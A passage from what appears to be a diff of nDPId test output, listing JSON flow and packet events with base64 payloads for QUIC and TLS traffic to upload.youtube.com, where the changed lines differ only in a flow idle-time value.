tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tdXBsb2FkLnlvdXR1YmUuY29tUTAzOQHogWCSkhrofu2AhqIVgpFkAAAAQ2hyb21lLzYyLjAuMzIwMi45NCBXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQAAAAAWDUwOQEAAAAeAAAAc5gRWgAAAABmJfKEu+Ky\/D790R+7T+2\/0X2\/pJXF+QSwhgBhJRTmB2QAAAABAAAANVJUT5jAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576794,"flow_last_seen":1511102576794,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102576794,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":51925,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576835,"flow_last_seen":1511102576835,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1511102576835,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1511102576835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576835,"pkt":"XEl5dU5q2MuK4S0uCABFAAA0AURAAIAGcnTAqAIbrNkXb+BsAbtWAw9KAAAAAIAC+vClngAAAgQFtAEDAwgBAQQC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102576835,"flow_last_seen":1511102576835,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1511102576835,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1511102576835,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576835,"pkt":"XEl5dU5q2MuK4S0uCABFAAA0AURAAIAGcnTAqAIbrNkXb+BsAbtWAw9KAAAAAIAC+vClngAAAgQFtAEDAwgBAQQC"} 02258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1511102576850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576850,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADkRtX+s2RdvwKgCGwG7ytUFTpL9CJHSvk7nMdgaAY7UOy2eqBjwqYbdQEABH3gBAQD\/\/\/\/6BgCAAVJFSgAIAAAAU1RLADgAAABTTk8AbAAAAFBST0a0AAAAU0NGR1MBAABSUkVKVwEAAFNUVExfAQAAQ1NDVFECAABDUlT\/XwkAAEbxGDSLTF1Q0EvnndIQSTAo6qDgodwKRUkl\/wgXSXZEn9QM2BlHJ5TGchczmqfpPPkVE8tMlsFMfVeayelDb2fy4YzLDv2N+n2kP+GPU+AvJ+LZZRk0N6KyGXGuCIybXc0DgBajeTEN+eTXljBGAiEAu2XBBVnB4JB\/pAM2aIMKtRsM68whkJeFp\/sUQ4KWuigCIQClJ1nIthgBruSaqgIGHfDqWyoEY6pcU10gsmGqIhMu0lNDRkcIAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAVEJLUCAAAABQVUJTQwAAAEtFWFNHAAAAT0JJVE8AAABFWFBZVwAAAEFFU0dDQzIw9lqyAICUa+kwugeWBsbKvkNISURUQjEwIAAAhphHmLi5BO0Bd0EZ92vmXccblzalgzbYj90Qfoq9ozBDMjU1MDAwMDAwMDBAFRRaAAAAAAwAAADPfAIAAAAAAADwAHUApLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BAAAAFfeBYhgQAABAMARjBEAiBdvW4RdrxYmmjeJbc+3jgs5l6RJLipl3aPIQhj9TtUVgIgA9hjkGDtPgI+WyeFtwtRP0uw9dCVeIWw5SDGQbdmUYsAdwDd6x0reg1PpiCLga2BaHB+Lo6dAdVciI09EcTNtuy+zAAAAV94FiCrAAAEAwBIMEYCIQCUIhZCh2zhmqj0uNpoeUCnAI4TO75j9mv1oMYRKX9EbwIhAIVqH7drJ4DDuKcAhaeeCXOoj8EoQkKnHGLbzkyKPDlhAQEDAeiBYJKSGugAAAAAALsLAAB4u4FGwB+tWGtQE1cUJpBXY6I8VdDyFNEgYZOQAr7wiYpWBawlaIsJ2cBCSCJJwEgVWK3A4KNOsVAVxfdjqlClUhXRURAFClYRHasEpKBgRdB
ILVjtzS6ETSYz9oczmdmc777Onnvu9527WTQrwFy0TRBKTcQLKrp9dm9xz+ylJ4l0NALQ0SJTNhpMGAZIGIUiTgYb8pXrDXnhuTHeCAI35bB6mBzcF\/AwMggEG8\/l8gN4AQK8oOLyArh8PlZQSS0uRWcy5oK8kSqS5YhoKCFpTNbnCo1cbciulQicavSLSfTLCXLA\/GIy2SCmBhjbXCGAaeAd62cA1adjf2xINJs5VuSOLXMcnO6g0xtjxu1zfIrK71z\/\/lBHSmjev8J8r4IzjW36x8zZNOc0+uStj3j5jQFTCvdXObyJDvLf4usWsNFD234IpYyDUMoYbF1AYEyIMUxgprRFy4BQm1YDYkdGbe4DoxE1cRNlsTkiuSRZgUgwczQwlUpYHofIYWI3ezYnVqbQSIiYI5sjEQfx+cECvhGWo1QwPWhGR4JnLMjJFDVvaGa8k59ILpJp1UisCsNHDLsjIhoybIah1TiI3NROUJramkR0FPHFOKJkc0BjBojNewCvTYGkdWaA2nxIipzgswQmGLCKYEiTCUa8hmAgaoIhlxEMpYmhNmwBbogkgDbw4BmdwRG5YU9wALQmwaAKwbrZDaEpiARWYJAhC1RqQKaxhmEsggUaGWzDvnEJ\/3lDO54Eq5NBL2JvMBWod+IRjNRQW4MlI+YJ2HmtQqPWiGE\/uSJWoUhEjKk3iJt1gyUaXPYxnAZwNUeMxRakTVIchroY"} 02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1511102576851,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102576851,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADkRtX+s2RdvwKgCGwG7ytUFTrHlCJHSvk7nMdgaAjk3HVeItBZp3u\/MM6QBBSEEhrNWhsBytYq44AhiRo+TwCmwTKGEk42JPpys442NKgutZCyRqQAAtRXqaDF9GcRDYiH0Y\/Fi0MLsDELQGJhY4OvQsShgL0wMj6PF4FCw0EDxBIlYDUjOl0D+boN8rExECEHyX7Bo9gIexu6+BD0Z6jwYVS5xhEFjCAVnb9OEZ+1zI6xu60jhXe7FYiEjXGJWdBF1I+wRdfS48r74X1JeZ567KHa5EJ3pD3ngVQyQUTCSgZUFTVprCgmiU6lxmUwgGRCEl12TIR\/Iu8iryOND7yMz0xaswN6jCztbGOmK9M1HAtnb0p6qNH6hov6O7rqWzJfC2lmeHtZeU6WbjsS8u3ntcJQzOr2oWOwTXcLWes24V6eOPFWo8+TNul2fEFLQ78eM1PXs2XQnqjfDqk3auk2v6+r9pEcxm7ylpmzrihbHoOb9i7fucvoKaS0tCfOsbMqMP3nB9ezFL69FLLtTF+p+dsZl1fPc\/DBpqVvY0e9eHrAZ+VA9+k3JGb\/9upojFbdLGEEHzpW4tGy79WmG8IZ+5InTV7teNKN9mWsYUcLOpqcV59uW1kr1OramoTHz1vv11JzRr2tDd4S\/WkfbF2P7ZGza6rI\/j9Us8WXle5QG\/b6jzfNgyphjqo6oKWSDFJMnAQGwxaXYlmTl4Z1d0i88lvqCkib10ZlL8sf48IBpMSTg8YAY8\/iBmBZzeXzwEwQLgqM\/pux\/6Oa0l01OXX1\/+c6p1ENoy\/3lC8tzQnqdlS7ZoRtbdlT15tR7dEe
\/E7HKePNyitQjIpd9cbgeFe\/qfiaMud5KybCv\/DovpHzVwiB95N8TOgZ2djpVNugjWfqwt\/tXNG+oKEpUZF25tdxtEmQz6wFdFS5Lfz91+rFA6vZLi+3IzzZMaO745y137UDe3TWvOGHFc27XdlUmuJypi3zktDjX7YazyO23wuMzY303CxB48w3nqlDPN5G7Ktoywmyvs\/+6kO9uVx38oy25qEe0fpf31qURmsfnntNrHN\/WeyacXdoQapOfb7Pxys\/NacXz+Q0XZq4ta9Z7e19lCXIKCwdG2mlzXAOrircnI\/g3DpRkByLCMjmYFj9jDB9zi+fW\/KMGh8A\/npA75EqgFPvB8xrHUWmTYjFShuyNNEGHqOBhDa5jAvygcyBwwyoCN6wtE0wGiocL7zg1ftXFTvv\/oJAPXPQs8EXNovaf7kkkqasq1vY36F29qncjsStini1pcp7kJZFuH1+dlSGJIedOLC7QMZTl5c4zutP4J9Iv6SmNyouUidqu3dUF52nOcEDd9M6QKlK\/grnxj\/XK1Uve+Vn11FT4bS89njFAcsiu3RvSfjG1ZmrcZ6\/q7\/pYJ88tuiS37l1AWTuTJOy02+fyavOojKMH1wn8z1UfTB\/zTWvuytPdcdnhPtCaI+KIa4F3p3V9yyYFZR1sUJ46vP5m5ZOaqgflXryX78ZeTWvRTfNvvGXb8cOSgXllHhLWeas8yH5iVlRBMCVoVB26EFSw0u7LpTGV75XHW9Nztb6\/wrxD58u4nYzXfW68h\/8B+TYP2QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1511102576862,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576862,"pkt":"2MuK4S0uXEl5dU5qCABFAAA0ZyEAADkGk5es2RdvwKgCGwG74GxxouM+VgMPS4ASpxyk0AAAAgQFZAEBBAIBAwMI"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1511102576863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1511102576863,"pkt":"XEl5dU5q2MuK4S0uCABFAAAoAUhAAIAGcnzAqAIbrNkXb+BsAbtWAw9LcaLjP1AQAQKLbgAAAAAAAAAA"} 
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1511102576835,"flow_last_seen":1511102576864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1511102576864,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1511102576835,"flow_last_seen":1511102576919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1511102576919,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01439{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1511102576835,"flow_last_seen":1511102576921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4258,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1511102576921,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","server_names":"upload.video.google.com,*.clients.google.com,*.docs.google.com,*.drive.google.com,*.gdata.youtube.com,*.googleapis.com,*.photos.google.com,*.upload.google.com,*.upload.youtube.com,*.youtube-3rd-party.com,upload.google.com,upload.youtube.com,uploads.stage.gdata.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=upload.video.google.com","alpn":"h2,http\/1.1","fingerprint":"EE:3E:32:FB:B1:2E:82:EE:DF:FF:C0:1B:27:CD:BF:D8:8A:CB:BD:63"}} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1511102576862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1511102576862,"pkt":"2MuK4S0uXEl5dU5qCABFAAA0ZyEAADkGk5es2RdvwKgCGwG74GxxouM+VgMPS4ASpxyk0AAAAgQFZAEBBAIBAwMI"} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1511102576863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1511102576863,"pkt":"XEl5dU5q2MuK4S0uCABFAAAoAUhAAIAGcnzAqAIbrNkXb+BsAbtWAw9LcaLjP1AQAQKLbgAAAAAAAAAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1511102576835,"flow_last_seen":1511102576864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1511102576864,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1511102576835,"flow_last_seen":1511102576919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1511102576919,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01439{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1511102576835,"flow_last_seen":1511102576921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":4258,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1511102576921,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":57452,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTubeUpload","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"upload.youtube.com","server_names":"upload.video.google.com,*.clients.google.com,*.docs.google.com,*.drive.google.com,*.gdata.youtube.com,*.googleapis.com,*.photos.google.com,*.upload.google.com,*.upload.youtube.com,*.youtube-3rd-party.com,upload.google.com,upload.youtube.com,uploads.stage.gdata.youtube.com","ja3":"bc6c386f480ee97b9d9e52d472b772d8","ja3s":"b26c652e0a402a24b5ca2a660e84f9d5","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=upload.video.google.com","alpn":"h2,http\/1.1","fingerprint":"EE:3E:32:FB:B1:2E:82:EE:DF:FF:C0:1B:27:CD:BF:D8:8A:CB:BD:63"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02245{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1511102578051,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578051,"pkt":"XEl5dU5q2MuK4S0uCABFAAViAV5AAIARbSHAqAIbrNkXb\/MYAbsFTi5hDQjRAddSQpCnUTAzOQGXrkR+sB0UFtwM1LigAQUUQ0hMTxMAAABQQUQAywMAAFNOSQDdAwAAVkVSAOEDAABDQ1MA8QMAAE1TUEP1AwAAVUFJRCQEAABUQ0lEKAQAAFBETUQsBAAAU01ITDAEAABJQ1NMNAQAAENUSU08BAAATk9OUFwEAABNSURTYAQAAFNDTFNkBAAAQ1NDVGQEAABDT1BUaAQAAElSVFRsBAAAQ0ZDV3AEAABTRkNXdAQAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS
0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tdXBsb2FkLnlvdXR1YmUuY29tUTAzOQHogWCSkhrofu2AhqIVgpFkAAAAQ2hyb21lLzYyLjAuMzIwMi45NCBXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQAAAAAWDUwOQEAAAAeAAAAdZgRWgAAAAA2Qv7BjobCVSSNm3vqxisDs2cBNiW7yusCpyOOCMJF82QAAAABAAAANVJUT5jAAAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1511102578051,"flow_last_seen":1511102578051,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1511102578051,"l3_proto":"ip4","src_ip":"192.168.2.27","dst_ip":"172.217.23.111","src_port":62232,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"Chrome\/62.0.3202.94 Windows NT 10.0; Win64; x64"}} 
02259{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"youtubeupload.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1511102578108,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1511102578108,"pkt":"2MuK4S0uXEl5dU5qCABFAAViAABAADgRtn+s2RdvwKgCGwG78xgFTs8jCAjRAddSQpCnAZLrpBY0DjIhd5jwe0ABH5UBAQD\/\/\/\/1BgCAAVJFSgAIAAAAU1RLADgAAABTTk8AbAAAAFBST0a0AAAAU0NGR1MBAABSUkVKVwEAAFNUVExfAQAAQ1NDVFECAABDUlT\/XwkAAOdd9OCaMJjZHEuQSnBheExXijy9L8yxcLxijUGUgt7VeQLmXHCE0dSCjTwUu4DOXBlw0HTG62CtZtu2a6Ru1X+sH1IA2FJqDRpGVA5MHyMKc7vKtJZUWy6Wq\/FvJH3N94ZirXYSBfeq9Qo8ATBGAiEAppVGAzltTsobgX744i5bBeIqIDO\/YtwFhdblUPMaf9ECIQDgN5eoKUWZEY4A\/yjD3jA5j4ZdDcRSfqhMU1oZUTGdIVNDRkcIAAAAQUVBRAgAAABTQ0lEGAAAAFBETUQcAAAAVEJLUCAAAABQVUJTQwAAAEtFWFNHAAAAT0JJVE8AAABFWFBZVwAAAEFFU0dDQzIw9lqyAICUa+kwugeWBsbKvkNISURUQjEwIAAAhphHmLi5BO0Bd0EZ92vmXccblzalgzbYj90Qfoq9ozBDMjU1MDAwMDAwMDBAFRRaAAAAAAwAAADNfAIAAAAAAADwAHUApLkJkLQYWBSHuxOizGdwCjw1mAT5G9+443fNDsgN3BAAAAFfeBYhgQAABAMARjBEAiBdvW4